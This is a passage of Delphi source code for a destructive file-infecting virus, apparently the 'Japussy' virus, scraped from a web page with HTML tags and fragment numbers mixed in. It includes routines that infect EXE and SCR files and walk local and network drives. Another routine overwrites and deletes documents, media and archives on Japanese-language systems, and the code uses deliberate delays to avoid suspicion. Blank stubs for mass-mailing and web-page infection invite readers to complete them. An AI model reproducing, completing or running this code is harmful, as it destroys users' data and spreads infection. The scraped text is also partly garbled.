77、結(jié)構(gòu) }</p><p>　　procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);</p><p><b>　　begin</b></p><p>　　Si.cb := SizeOf(Si);</p><p>　　Si.lpReserved := nil

78、;</p><p>　　Si.lpDesktop := nil;</p><p>　　Si.lpTitle := nil;</p><p>　　Si.dwFlags := STARTF_USESHOWWINDOW;</p><p>　　Si.wShowWindow := State;</p><p>　　Si.cbRe

79、served2 := 0;</p><p>　　Si.lpReserved2 := nil;</p><p><b>　　end;</b></p><p><b>　　{ 發(fā)帶毒郵件 }</b></p><p>　　procedure SendMail;</p><p>&l

80、t;b>　　begin</b></p><p>　　//哪位仁兄愿意完成之？</p><p><b>　　end;</b></p><p>　　{ 感染PE文件 }</p><p>　　procedure InfectOneFile(FileName: string);</p><p

81、><b>　　var</b></p><p>　　HdrStream, SrcStream: TFileStream;</p><p>　　IcoStream, DstStream: TMemoryStream;</p><p>　　iID: LongInt;</p><p>　　aIcon: TIcon;<

82、/p><p>　　Infected, IsPE: Boolean;</p><p>　　i: Integer;</p><p>　　Buf: array[0..1] of Char;</p><p><b>　　begin</b></p><p>　　try //出錯(cuò)則文件正在被使用，退出</p

83、><p>　　if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己則不感染</p><p><b>　　Exit;</b></p><p>　　Infected := False;</p><p>　　IsPE := False;</p&g

84、t;<p>　　SrcStream := TFileStream.Create(FileName, fmOpenRead);</p><p><b>　　try</b></p><p>　　for i := 0 to $108 do //檢查PE文件頭</p><p><b>　　begin</b></

85、p><p>　　SrcStream.Seek(i, soFromBeginning);</p><p>　　SrcStream.Read(Buf, 2);</p><p>　　if (Buf[0] = #80) and (Buf[1] = #69) then //PE標(biāo)記</p><p><b>　　begin</b><

86、;/p><p>　　IsPE := True; //是PE文件</p><p><b>　　Break;</b></p><p><b>　　end;</b></p><p><b>　　end;</b></p><p>　　SrcStream.Seek(-

87、4, soFromEnd); //檢查感染標(biāo)記</p><p>　　SrcStream.Read(iID, 4);</p><p>　　if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染</p><p>　　Infected := True;</p><p><b&g

88、t;　　finally</b></p><p>　　SrcStream.Free;</p><p><b>　　end;</b></p><p>　　if Infected or (not IsPE) then //如果感染過了或不是PE文件則退出</p><p><b>　　Exit;</b

89、></p><p>　　IcoStream := TMemoryStream.Create;</p><p>　　DstStream := TMemoryStream.Create;</p><p><b>　　try</b></p><p>　　aIcon := TIcon.Create;</p>

90、<p><b>　　try</b></p><p>　　//得到被感染文件的主圖標(biāo)(744字節(jié))，存入流</p><p>　　aIcon.ReleaseHandle;</p><p>　　aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);</p><

91、;p>　　aIcon.SaveToStream(IcoStream);</p><p><b>　　finally</b></p><p>　　aIcon.Free;</p><p><b>　　end;</b></p><p>　　SrcStream := TFileStream.Creat

92、e(FileName, fmOpenRead);</p><p><b>　　//頭文件</b></p><p>　　HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or </p><p>　　fmShareDenyNone);</p><p><b&

93、gt;　　try</b></p><p>　　//寫入病毒體主圖標(biāo)之前的數(shù)據(jù)</p><p>　　CopyStream(HdrStream, 0, DstStream, 0, IconOffset);</p><p>　　//寫入目前程序的主圖標(biāo)</p><p>　　CopyStream(IcoStream, 22, DstStr

94、eam, IconOffset, IconSize);</p><p>　　//寫入病毒體主圖標(biāo)到病毒體尾部之間的數(shù)據(jù)</p><p>　　CopyStream(HdrStream, IconTail, DstStream, IconTail, </p><p>　　HeaderSize - IconTail);</p><p><b&

95、gt;　　//寫入宿主程序</b></p><p>　　CopyStream(SrcStream, 0, DstStream, HeaderSize, </p><p>　　SrcStream.Size);</p><p>　　//寫入已感染的標(biāo)記</p><p>　　DstStream.Seek(0, 2);</p>

96、<p>　　iID := $44444444;</p><p>　　DstStream.Write(iID, 4);</p><p><b>　　finally</b></p><p>　　HdrStream.Free;</p><p><b>　　end;</b></p>

97、<p><b>　　finally</b></p><p>　　SrcStream.Free;</p><p>　　IcoStream.Free;</p><p>　　DstStream.SaveToFile(FileName); //替換宿主文件</p><p>　　DstStream.Free;<

98、/p><p><b>　　end;</b></p><p><b>　　except;</b></p><p><b>　　end;</b></p><p><b>　　end;</b></p><p>　　{ 將目標(biāo)文件寫入垃圾碼后刪

99、除 }</p><p>　　procedure SmashFile(FileName: string);</p><p><b>　　var</b></p><p>　　FileHandle: Integer;</p><p>　　i, Size, Mass, Max, Len: Integer;</p>

100、<p><b>　　begin</b></p><p><b>　　try</b></p><p>　　SetFileAttributes(PChar(FileName), 0); //去掉只讀屬性</p><p>　　FileHandle := FileOpen(FileName, fmOpenWrite);

101、//打開文件</p><p><b>　　try</b></p><p>　　Size := GetFileSize(FileHandle, nil); //文件大小</p><p><b>　　i := 0;</b></p><p>　　Randomize;</p><p>

102、;　　Max := Random(15); //寫入垃圾碼的隨機(jī)次數(shù)</p><p>　　if Max < 5 then</p><p><b>　　Max := 5;</b></p><p>　　Mass := Size div Max; //每個(gè)間隔塊的大小</p><p>　　Len := Length(Ca

103、tchword);</p><p>　　while i < Max do</p><p><b>　　begin</b></p><p>　　FileSeek(FileHandle, i * Mass, 0); //定位</p><p>　　//寫入垃圾碼，將文件徹底破壞掉</p><p>

104、　　FileWrite(FileHandle, Catchword, Len);</p><p><b>　　Inc(i);</b></p><p><b>　　end;</b></p><p><b>　　finally</b></p><p>　　FileClose(Fil

105、eHandle); //關(guān)閉文件</p><p><b>　　end;</b></p><p>　　DeleteFile(PChar(FileName)); //刪除之</p><p><b>　　except</b></p><p><b>　　end;</b></p&

106、gt;<p><b>　　end;</b></p><p>　　{ 獲得可寫的驅(qū)動(dòng)器列表 }</p><p>　　Function GetDrives()function GetDrives: string;</p><p><b>　　var</b></p><p>　　DiskTy

107、pe: Word;</p><p><b>　　D: Char;</b></p><p>　　Str: string;</p><p>　　i: Integer;</p><p><b>　　begin</b></p><p>　　for i := 0 to 25 do //

108、遍歷26個(gè)字母</p><p><b>　　begin</b></p><p>　　D := Chr(i + 65);</p><p>　　Str := D + ':';</p><p>　　DiskType := GetDriveType(PChar(Str));</p><p>

109、;　　//得到本地磁盤和網(wǎng)絡(luò)盤</p><p>　　if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then</p><p>　　Result := Result + D;</p><p><b>　　end;</b></p><p><b>　

110、　end;</b></p><p>　　{ 遍歷目錄，感染和摧毀文件 }</p><p>　　procedure LoopFiles(Path, Mask: string);</p><p><b>　　var</b></p><p>　　i, Count: Integer;</p><p

111、>　　Fn, Ext: string;</p><p>　　SubDir: TStrings;</p><p>　　SearchRec: TSearchRec;</p><p>　　Msg: TMsg;</p><p>　　Function IsValidDir()function IsValidDir(SearchRec: TSear

112、chRec): Integer;</p><p><b>　　begin</b></p><p>　　if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and</p><p>　　(SearchRec.Name <> '..&

113、#39;) then</p><p>　　Result := 0 //不是目錄</p><p>　　else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and</p><p>　　(SearchRec.Name <> '..') then<

114、/p><p>　　Result := 1 //不是根目錄</p><p>　　else Result := 2; //是根目錄</p><p><b>　　end;</b></p><p><b>　　begin</b></p><p>　　if (FindFirst(Path

115、+ Mask, faAnyFile, SearchRec) = 0) then</p><p><b>　　begin</b></p><p><b>　　repeat</b></p><p>　　PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //調(diào)整消息隊(duì)列，避免引起懷疑</p>

116、<p>　　if IsValidDir(SearchRec) = 0 then</p><p><b>　　begin</b></p><p>　　Fn := Path + SearchRec.Name;</p><p>　　Ext := UpperCase(ExtractFileExt(Fn));</p><

117、p>　　if (Ext = '.EXE') or (Ext = '.SCR') then</p><p><b>　　begin</b></p><p>　　InfectOneFile(Fn); //感染可執(zhí)行文件 </p><p><b>　　end</b></p

118、><p>　　else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') </p><p><b>　　then</b></p><p><b>　　begin</b></p><p>　　//感

119、染HTML和ASP文件，將Base64編碼后的病毒寫入</p><p>　　//感染瀏覽此網(wǎng)頁的所有用戶</p><p>　　//哪位大兄弟愿意完成之？</p><p><b>　　end</b></p><p>　　else if Ext = '.WAB' then //Outlook地址簿文件<

120、/p><p><b>　　begin</b></p><p>　　//獲取Outlook郵件地址</p><p><b>　　end</b></p><p>　　else if Ext = '.ADC' then //Foxmail地址自動(dòng)完成文件</p><p>

121、;<b>　　begin</b></p><p>　　//獲取Foxmail郵件地址</p><p><b>　　end</b></p><p>　　else if Ext = 'IND' then //Foxmail地址簿文件</p><p><b>　　begin<

122、;/b></p><p>　　//獲取Foxmail郵件地址</p><p><b>　　end</b></p><p><b>　　else </b></p><p><b>　　begin</b></p><p>　　if IsJap then

123、 //是倭文操作系統(tǒng)</p><p><b>　　begin</b></p><p>　　if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or</p><p>　　(Ext = '.MP3') or (Ext = '

124、;.RM') or (Ext = '.RA') or</p><p>　　(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or</p><p>　　(Ext = '.MPEG') or (Ext = '.ASF') or (Ext =

125、 '.JPG') or</p><p>　　(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or</p><p>　　(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') th

126、en</p><p>　　SmashFile(Fn); //摧毀文件</p><p><b>　　end;</b></p><p><b>　　end;</b></p><p><b>　　end;</b></p><p>　　//感染或刪除一個(gè)文件后睡

127、眠200毫秒，避免CPU占用率過高引起懷疑</p><p>　　Sleep(200);</p><p>　　until (FindNext(SearchRec) <> 0);</p><p><b>　　end;</b></p><p>　　FindClose(SearchRec);</p>&